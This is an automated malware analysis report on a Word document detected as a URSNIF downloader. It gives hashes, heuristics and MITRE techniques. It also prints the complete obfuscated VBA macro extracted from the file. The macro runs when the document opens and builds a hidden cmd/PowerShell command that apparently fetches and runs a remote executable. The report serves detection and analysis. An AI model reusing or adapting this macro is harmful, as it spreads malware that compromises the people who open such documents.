Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd9951ca0066007e…

MALICIOUS

Office (OLE)

65.5 KB Created: 2018-09-10 06:32:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: e13e3a54ff2d1b82f54c4446178ed3b3 SHA-1: 2c26728f03cad22010a7676191d45db4046ac35f SHA-256: bd9951ca0066007e84a8fbcdd9ed75e59b27c50bee2ceae4e384a24775394028
152 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is triggered by the Document_Open event. This macro utilizes the Shell() function to execute a command, likely to download and run a second-stage payload. The ClamAV detection as 'Doc.Downloader.URSNIF' further supports this behavior. The specific command executed is obfuscated but appears to involve 'cmd.exe /V /e set ...', suggesting a downloader or dropper functionality.

Heuristics 6

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       Second "sNGcDn" + "EqsfD" + "wpmkOnijjf" + "D"
Shell FUbZDRlmmR + GOfGkmON, CStr(vbHide)
   Second "6842" + "urbRbhmPB"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
On _
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5188 bytes
SHA-256: a59d0d75e135fabbb508dd7a060f14ae4b077497d2b2337742c82df7100b535b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
56 of 85 identifiers look randomly generated (e.g. 'mqnnciuYVPSrZh'); 15 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "uHGWiAmqTDs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "GTC" + "pQD" + "238850110" + "v"
   Second "zQjJ" + "nGzt"
   Second "pF" + "485259260"
   Second "sNGcDn" + "EqsfD" + "wpmkOnijjf" + "D"
Shell FUbZDRlmmR + GOfGkmON, CStr(vbHide)
   Second "6842" + "urbRbhmPB"
   Second "muNsBirvrKCK" + "djN"
End Sub



Attribute VB_Name = "DYvUaSvfmBzH"
Function FUbZDRlmmR()

On _
Error _
Resume _
Next
Second "Qv" + "9078" + "266851503" + "279707765"
   Second "TBrriLF" + "423134774" + "7028" + "ofbNizija"
   Second "a" + "1321"
   Second "162630592" + "bOFQwwCTJv" + "MMoTiITn" + "nKYpSVpK"
   Second "466926327" + "151547686"
DYKYVNpVvWj = Format(Chr(1 + 12 + 15 + 11 + 60)) + "md" + " " + "/V/" + Format(Chr(0 + 8 + 10 + 7 + 42)) + Format(Chr(0 + 4 + 4 + 3 + 23)) + "s" + "^e^" + "t b"
Second "351704258" + "8834" + "o" + "432162443"
   Second "lOiHJlB" + "vbouISh"
   Second "oFaTOd" + "kYNTFjTwZJrs" + "AOnV" + "ZVBXtEQY"
   Second "zdGsI" + "332417580" + "199992884" + "7099"
   Second "49307178" + "XLVzpSC" + "6650" + "wKMzt"
QdwzkU = "^M= " + " ^  " + " " + " ^ " + "^ ^" + " ^ "
Second "242" + "199950827"
   Second "488" + "nXlXifM"
DKqGEihJtJX = " ^ ^  " + "^" + " " + " ^ }}" + "^{^h" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^t^" + "a" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^}^;" + "^k^aer" + "b;" + "t"
Second "4291" + "wb"
   Second "SaREs" + "HpMi"
bKlwjZFqtp = Format(Chr(0 + 8 + 10 + 7 + 42)) + "i$^ ^" + "metI-" + "^" + "e^ko"
Second "1078" + "pLIIpU" + "bd" + "QnvMOJ"
TDXGPr = "vnI^;" + ")" + "t" + Format(Chr(0 + 8 + 10 + 7 + 42)) + "^i^$^" + " ,^b^" + "X^D^" + "$" + "(el^i^F" + "d"
FUbZDRlmmR = DYKYVNpVvWj + QdwzkU + DKqGEihJtJX + bKlwjZFqtp + TDXGPr
   Second "245285517" + "azbiWM" + "hdzKGOfw" + "wjNJ"
End Function
Function GOfGkmON()

On _
Error _
Resume _
Next
Second "BHzp" + "648" + "ZolXs" + "l"
   Second "wfFj" + "zWjE" + "518689080" + "504861245"
   Second "pwBQwctjK" + "439753896"
   Second "329483111" + "bhO" + "223374708" + "lvMndd"
BnWpwY = "aol" + "n^wo" + "D." + "^j^b" + "^m^$"
Second "cGVwIjfcrPz" + "iuL"
   Second "314570321" + "4888"
   Second "SwSE" + "381617410" + "7738" + "WZzI"
NRAhiYOGVD = "^{" + "yrt{)G" + "^" + "dw$ ni" + " ^b" + "^X^D$(" + "^h" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "aer" + "^of^;'" + "^e^x" + "^e.^'" + "+" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "N^P$+" + "'^\'^" + "+" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^ilb"
Second "EniPLVnjSHK" + "YbUlfbiTP"
   Second "8805" + "202633571"
   Second "Djhz" + "512667952"
   Second "4949" + "1486"
iNifLzKrAs = "^u" + "p^:" + "vne^$=t" + Format(Chr(0 + 8 + 10 + 7 + 42)) + "^i$^" + ";'^59" + "^2'"
Second "Z" + "FSFifz"
   Second "ww" + "fuM" + "492398275" + "692"
WwNYhUF = "^ ^= " + Format(Chr(1 + 12 + 15 + 11 + 60)) + "N" + "P$^;)^" + "'^@" + "^'(ti^l" + "^p^S^." + "^'nk^t" + ".^9^gm" + "o=l^?^" + "ph" + "p" + "^.^"
Second "oSvoG" + "UYH" + "1949" + "218635637"
   Second "BpcqivBWsDY" + "ca"
   Second "nhN" + "dfiO"
iYBNzHUzzCO = "toksna^" + "p^o" + "/T" + "TR" + "/^mo" + Format(Chr(1 + 12 + 15 + 11 + 60)) + ".^" + "d^" + "s" + "a^yte^" + "e^g" + "h^y" + "^yu^u"
Second "WXDHmwlk" + "WztG"
   Second "CJVLOSJGjaD" + "KwET"
TMzbzM = "^dn^e/" + "/^:p^" + "t^th^" + "'^=Gd" + "w^$^;^t"
Second "ddlfEnQYWTj" + "pizGVzZqo" + "iB" + "p"
   Second "KqKVsicnF" + "SChc" + "8819" + "5381"
   Second "OlBiZN" + "530" + "Uhi" + "blPCzDLTz"
OCRszVm = "ne^il" + Format(Chr(0 + 8 + 10 + 7 + 42)) + "^beW^." + "^t^e" + "N" + "^ t" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^" + "ejb^o^" + "-wen=^j" + "bm$ l" + "l^ehs"
Second "ZU" + "zpWXBzUvkdPXwa" + "L" + "FP"
   Second "5878" + "JbowmfwC"
   Second "516709086" + "WIda"
   Second "Xzu" + "dD" + "Mf" + "1506"
QzGKjLkfvn = "re^w^o^" + "p&&^for" + " /^" + "L" + " %^u"
Second "hzb" + "ZTZ" + "j" + "143197305"
   Second "229679995" + "zwLvpfwjiXv"
   Second "vUAjl" + "Y" + "ncM" + "tGH"
   Second "70558587" + "UlAK" + "454893346" + "XnOhbPUX"
mDFVWij = " ^in (^" + "2^6^5" + ";-1;0" + ")" + "^do ^" + "s^et "
Second "6308" + "NSEdJFQkl"
   Second "ffJt" + "kTWHXrCmljYnK"
DmLiPX = "O^W^" + "3=!O" + "^W" + "^3" + "!!b^M:~" + "%^u,1!" + "&&i" + "^f %^u " + "l^" + "e"
Second "iWPLdBK" + "mqnnciuYVPSrZh"
   Second "iwzGAzr" + "NwnkI" + "203822623" + "992"
   Second "ZfMB" + "89227083" + "437667189" + "351597084"
   Second "131549004" + "2005"
KPtKMCOQPhc = "^q ^0 " + Format(Chr(1 + 12 + 15 + 11 + 60)) + "al" + "^" + "l %O^W" + "^" + "3" + ":^~^5" + "%" + Format(Chr(0 + 4 + 4 + 3 + 23)) + ""
GOfGkmON = BnWpwY + NRAhiYOGVD + iNifLzKrAs + WwNYhUF + iYBNzHUzzCO + TMzbzM + OCRszVm + QzGKjLkfvn + mDFVWij + DmLiPX + KPtKMCOQPhc
   Second "wNZfvKQp" + "hQpvfDSm" + "8384" + "325794529"
   Second "7575" + "u"
   Second "hBE" + "448593552" + "4843" + "3551"
   Second "2702" + "bklzWQJ"
   Second "Gql" + "f"
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.